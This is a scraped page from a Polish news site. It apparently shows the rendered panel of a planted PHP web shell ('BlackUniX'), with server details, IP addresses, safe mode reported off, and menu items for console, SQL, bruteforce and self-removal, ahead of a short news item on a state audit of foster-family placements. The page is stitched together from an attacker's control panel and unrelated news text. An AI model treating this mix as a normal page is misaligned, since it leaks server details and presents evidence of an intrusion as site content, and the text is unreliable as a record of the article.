Aktualności w serwisie wstroneojca.pl


BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-17 09:42:02
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.17.157
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Rodzice z przypadku
Aktualności
Rodzicami zastępczymi zostają osoby, które nigdy nie powinny pełnić tej funkcji alarmuje Najwyższa Izba Kontroli. Nieprawidłowości przy decyzjach o wyborze rodziny zastępczej wykryto w 70 proc. ośrodków. Sąd Rejonowego w Oleśnie, który ustanowił jako ojca zastępczego osobę wcześniej karaną. W innym przypadku matką zastępczą została kobieta, która porzuciła czwórkę własnych dzieci. Ten sam sąd ustanowił rodziną zastępczą osoby nie mające stałego źródła utrzymania ani odpowiedniego mieszkania. NIK ocenia też, że powiatowe centra i ośrodki miejskie dość niefrasobliwie podchodzą do opracowania strategii rozwiązywania problemów społecznych. Poza tym ośrodki i centra nie zawsze monitorują sytuację dzieci, które trafiają do rodzin zastępczych, tłumacząc to brakami kadrowymi.